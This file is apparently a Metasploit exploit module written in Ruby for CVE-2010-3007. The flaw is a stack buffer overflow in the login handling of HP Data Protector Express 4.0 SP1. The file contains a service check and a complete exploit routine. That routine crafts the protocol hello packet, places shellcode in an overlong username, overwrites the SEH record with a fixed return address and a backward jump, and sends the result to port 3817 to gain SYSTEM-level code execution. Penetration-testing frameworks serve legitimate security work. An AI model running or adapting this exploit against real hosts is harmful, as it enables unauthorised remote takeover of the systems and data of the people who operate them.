1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::Remote::Tcp
10
  include Msf::Exploit::Remote::Seh
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'HP Data Protector DtbClsLogin Buffer Overflow',
17
        'Description' => %q{
18
          This module exploits a stack buffer overflow in HP Data Protector 4.0 SP1. The
19
          overflow occurs during the login process, in the DtbClsLogin function provided by
20
          the dpwindtb.dll component, where the Utf8Cpy (strcpy like function) is used in an
21
          insecure way with the username. A successful exploitation will lead to code execution
22
          with the privileges of the "dpwinsdr.exe" (HP Data Protector Express Domain Server
23
          Service) process, which runs as SYSTEM by default.
24
        },
25
        'Author' => [
26
          'AbdulAziz Hariri', # Vulnerability discovery
27
          'juan vazquez' # Metasploit module
28
        ],
29
        'References' => [
30
          [ 'CVE', '2010-3007' ],
31
          [ 'OSVDB', '67973' ],
32
          [ 'BID', '43105' ],
33
          [ 'ZDI', '10-174' ],
34
          [ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02498535' ]
35
        ],
36
        'Payload' => {
37
          'Space' => 712,
38
          'BadChars' => "\x00",
39
          'DisableNops' => true
40
        },
41
        'Platform' => 'win',
42
        'Targets' => [
43
          [
44
            'HP Data Protector Express 4.0 SP1 (build 43064) / Windows XP SP3',
45
            {
46
              'Ret' => 0x66dd3e49, # ppr from ifsutil.dll (stable over windows updates on June 26, 2012)
47
              'Offset' => 712
48
            }
49
          ]
50
        ],
51
        'DefaultTarget' => 0,
52
        'Privileged' => true,
53
        'DisclosureDate' => '2010-09-09',
54
        'Notes' => {
55
          'Reliability' => UNKNOWN_RELIABILITY,
56
          'Stability' => UNKNOWN_STABILITY,
57
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
58
        }
59
      )
60
    )
61
    register_options(
62
      [
63
        Opt::RPORT(3817),
64
      ]
65
    )
66
  end
67

68
  def check
69
    connect
70

71
    machine_name = rand_text_alpha(15)
72

73
    print_status("#{sock.peerinfo} - Sending Hello Request")
74
    hello = "\x54\x84\x00\x00\x00\x00\x00\x00" << "\x00\x01\x00\x00\x92\x00\x00\x00"
75
    hello << "\x3a\x53\xa5\x71\x02\x40\x80\x00" << "\x89\xff\xb5\x00\x9b\xe8\x9a\x00"
76
    hello << "\x01\x00\x00\x00\xc0\xa8\x01\x86" << "\x00\x00\x00\x00\x00\x00\x00\x00"
77
    hello << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
78
    hello << "\x00\x00\x00\x00\x01\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
79
    hello << "\x00\x00\x00\x00"
80
    hello << machine_name << "\x00"
81
    hello << "\x5b\x2e\xad\x71\xb0\x02\x00\x00" << "\xff\xff\x00\x00\x06\x10\x00\x44"
82
    hello << "\x74\x62\x3a\x20\x43\x6f\x6e\x74" << "\x65\x78\x74\x00\xe8\xc1\x08\x10"
83
    hello << "\xb0\x02\x00\x00\xff\xff\x00\x00" << "\x06\x10\x00\x00\x7c\xfa"
84

85
    sock.put(hello)
86
    hello_response = sock.get_once(-1, 10)
87
    disconnect
88

89
    if hello_response and hello_response =~ /Dtb: Context/
90
      return Exploit::CheckCode::Detected
91
    end
92

93
    return Exploit::CheckCode::Safe
94
  end
95

96
  def exploit
97
    connect
98

99
    machine_name = rand_text_alpha(15)
100

101
    print_status("#{sock.peerinfo} - Sending Hello Request")
102
    hello = "\x54\x84\x00\x00\x00\x00\x00\x00" << "\x00\x01\x00\x00\x92\x00\x00\x00"
103
    hello << "\x3a\x53\xa5\x71\x02\x40\x80\x00" << "\x89\xff\xb5\x00\x9b\xe8\x9a\x00"
104
    hello << "\x01\x00\x00\x00\xc0\xa8\x01\x86" << "\x00\x00\x00\x00\x00\x00\x00\x00"
105
    hello << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
106
    hello << "\x00\x00\x00\x00\x01\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
107
    hello << "\x00\x00\x00\x00"
108
    hello << machine_name << "\x00"
109
    hello << "\x5b\x2e\xad\x71\xb0\x02\x00\x00" << "\xff\xff\x00\x00\x06\x10\x00\x44"
110
    hello << "\x74\x62\x3a\x20\x43\x6f\x6e\x74" << "\x65\x78\x74\x00\xe8\xc1\x08\x10"
111
    hello << "\xb0\x02\x00\x00\xff\xff\x00\x00" << "\x06\x10\x00\x00\x7c\xfa"
112

113
    sock.put(hello)
114
    hello_response = sock.get_once(-1, 10)
115

116
    if not hello_response or hello_response.empty?
117
      print_error("#{sock.peerinfo} - The Hello Request hasn't received a response")
118
      return
119
    end
120

121
    bof = payload.encoded
122
    bof << rand_text(target['Offset'] - bof.length)
123
    bof << generate_seh_record(target.ret)
124
    bof << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{target['Offset'] + 8}").encode_string
125
    # The line below is used to trigger exception, don't go confused because of the big space,
126
    # there are only some available bytes until the end of the stack, it allows to assure exception
127
    # when there are mappings for dynamic memory after the stack, so to assure reliability it's better
128
    # to jump back.
129
    bof << rand_text(100000)
130

131
    header = [0x8451].pack("V") # packet id
132
    header << [0x32020202].pack("V") # svc id
133
    header << [0x00000018].pack("V") # cmd id
134
    header << [0].pack("V") # pkt length, calculated after pkt has been built
135
    header << "\x00\x00\x00\x00" # ?Unknown?
136

137
    pkt_auth = header
138
    pkt_auth << bof # username
139

140
    pkt_auth[12, 4] = [pkt_auth.length].pack("V")
141

142
    print_status("#{sock.peerinfo} - Sending Authentication Request")
143

144
    sock.put(pkt_auth)
145
    disconnect
146
  end
147
end
148

149